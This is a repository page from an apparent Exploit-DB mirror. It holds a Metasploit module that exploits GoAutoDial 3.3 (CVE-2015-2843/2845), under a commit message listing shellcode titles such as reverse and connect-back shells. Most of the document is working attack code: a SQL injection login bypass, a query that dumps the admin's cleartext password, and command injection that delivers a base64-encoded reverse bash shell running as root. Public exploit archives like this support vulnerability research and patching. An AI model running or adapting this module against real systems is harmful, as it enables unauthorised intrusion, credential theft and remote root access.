bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/unix/remote/42296.rb
Offensive Security 9a0992d704 DB: 2017-07-06 
3 new exploits

GoAutoDial 3.3 - Authentication Bypass / Command Injection (Metasploit)
Lepide Auditor Suite - 'createdb()' Web Console Database Injection Remote Code Execution

(Generator) - /bin/sh Polymorphic Shellcode with printable ASCII characters
(Generator) - /bin/sh Polymorphic With Printable ASCII Characters Shellcode

(Generator) - Alphanumeric Shellcode Encoder/Decoder
(Generator) - Alphanumeric Shellcode (Encoder/Decoder)

Win32 - Multi-Format Shellcode Encoding Tool (Generator)
Win32 - Multi-Format Encoding Tool Shellcode (Generator)

Linux/x86 - Self-modifying Shellcode for IDS evasion (64 bytes)
Linux/x86 - Self-modifying for IDS evasion Shellcode (64 bytes)

Linux/x86 - Listens for Shellcode on 5555/TCP + Jumps to it (83 bytes)
Linux/x86 - Listens on 5555/TCP + Jumps to it Shellcode (83 bytes)

Linux/x86 - Shellcode Obfuscator
Linux/x86 - Shellcode Obfuscator (Generator)

Linux/x86 - Connectback Shellcode 127.0.0.1:31337/TCP (74 bytes)
Linux/x86 - Connectback 127.0.0.1:31337/TCP Shellcode (74 bytes)

OpenBSD/x86 - Add user _w00w00_ (112 Shellcode bytes)
OpenBSD/x86 - Add user _w00w00_ Shellcode (112 bytes)

Solaris/SPARC - connect-bac Shellcode k (204 bytes)
Solaris/SPARC - connect-back Shellcode (204 bytes)

Win32 - Download + Execute Shellcode (Generator) (Browsers Edition) (275+ bytes)
Win32 - Download + Execute Shellcode (Browsers Edition) (Generator)  (275+ bytes)

Windows 9x/NT/2000/XP - Reverse Generic Shellcode without Loader (249 bytes)
Windows 9x/NT/2000/XP - Reverse Generic without Loader Shellcode (249 bytes)

Windows XP/2000/2003 - Connect Back Shellcode for Overflow (275 bytes)
Windows XP/2000/2003 - Overflow Connect Back Shellcode (275 bytes)

Windows - Safari JS JITed Shellcode - exec calc (ASLR/DEP bypass)
Safari 4.0.5 - 5.0.0 (Windows XP /  7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Shellcode

ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic  Shellcode (Generator)
ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)

Win32 - Shellcode Checksum Routine (18 bytes)
Win32 - Checksum Routine Shellcode (18 bytes)

Linux/MIPS - XOR Shellcode Encoder (60 bytes)
Linux/MIPS - XOR Encoder Shellcode (Generator) (60 bytes)
Linux/x86 - custom execve-Shellcode Encoder/Decoder
Linux/x86 - Execve /bin/sh Shellcode Via Push (21 bytes)
Linux/x86-64 - Execve /bin/sh Shellcode Via Push (23 bytes)
Linux/x86 - custom execve Shellcode (Encoder/Decoder) (Generator)
Linux/x86 - Execve /bin/sh Via Push Shellcode (21 bytes)
Linux/x86-64 - Execve /bin/sh Via Push Shellcode (23 bytes)

Windows XP < 10 - WinExec Null-Free Shellcode (Python) (Generator)
Windows XP < 10 - WinExec Null-Free Shellcode (Generator) (Python)

Linux/x86 - /bin/sh Shellcode + ASLR Bruteforce
Linux/x86 - /bin/sh + ASLR Bruteforce Shellcode

Linux/x86 - Bind Netcat Shellcode with Port (44/52 bytes)
Linux/x86 - Bind Netcat with Port Shellcode (44/52 bytes)

Linux/x86 - Reverse TCP Shellcode (67 bytes)
2017-07-06 05:01:24 +00:00

141 lines
No EOL
4.3 KiB
Ruby
Executable file
Raw Blame History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "GoAutoDial 3.3 Authentication Bypass / Command Injection",
'Description' => %q{
This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges. The default pre-packaged ISO builds are available from goautodial.org. Currently, the hardcoded command injection payload is an encoded reverse-tcp bash one-liner and the handler should be setup to receive it appropriately.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris McCurley', # Discovery & Metasploit module
],
'References' =>
[
['CVE', '2015-2843'],
['CVE', '2015-2845']
],
'Platform' => %w{unix},
'Arch' => ARCH_CMD,
'Targets' => [ ['Automatic', {} ] ],
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Apr 21 2015'))
register_options(
[
OptPort.new('RPORT', [true, 'The target port', 443]),
OptBool.new('SSL', [false, 'Use SSL', true]),
OptString.new('TARGETURI', [true, 'The base path', '/'])
])
end
def check
res = check_version()
if res and res.body =~ /1421902800/
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Vulnerable
end
end
def check_version()
uri = target_uri.path
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'changelog.txt'),
'headers' => {
'User-Agent' => 'Mozilla/5.0',
'Accept-Encoding' => 'identity'
}
})
end
def sqli_auth_bypass()
uri = target_uri.path
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'index.php', 'go_login', 'validate_credentials'),
'headers' => {
'User-Agent' => 'Mozilla/5.0',
'Accept-Encoding' => 'identity'
},
'vars_post' => {
'user_name' => 'admin',
'user_pass' => '\'%20or%20\'1\'%3D\'1'
}
})
end
def sqli_admin_pass(cookies)
uri = target_uri.path
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php', 'go_site', 'go_get_user_info', '\'%20OR%20active=\'Y'),
'headers' => {
'User-Agent' => 'Mozilla/5.0',
'Accept-Encoding' => 'identity',
'Cookie' => cookies
}
})
end
#
# Run the actual exploit
#
def execute_command()
encoded = Rex::Text.encode_base64("#{payload.encoded}")
params = "||%20bash%20-c%20\"eval%20`echo%20-n%20" + encoded + "%20|%20base64%20--decode`\""
uri = target_uri.path
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php', 'go_site', 'cpanel', params),
'headers' => {
'User-Agent' => 'Mozilla/5.0',
'Accept-Encoding' => 'identity',
'Cookie' => @cookie
}
})
end
def exploit()
print_status("#{rhost}:#{rport} - Trying SQL injection...")
res1 = sqli_auth_bypass()
if res1 && res1.code == 200
print_good('Authentication Bypass (SQLi) was successful')
else
print_error('Error: Run \'check\' command to identify whether the auth bypass has been fixed')
end
@cookie = res1.get_cookies
print_status("#{rhost}:#{rport} - Dumping admin password...")
res = sqli_admin_pass(@cookie)
if res
print_good(res.body)
else
print_error('Error: No creds returned, possible mitigations are in place.')
end
print_status("#{rhost}:#{rport} - Sending payload...waiting for connection")
execute_command()
end
end
Reference in a new issue View git blame Copy permalink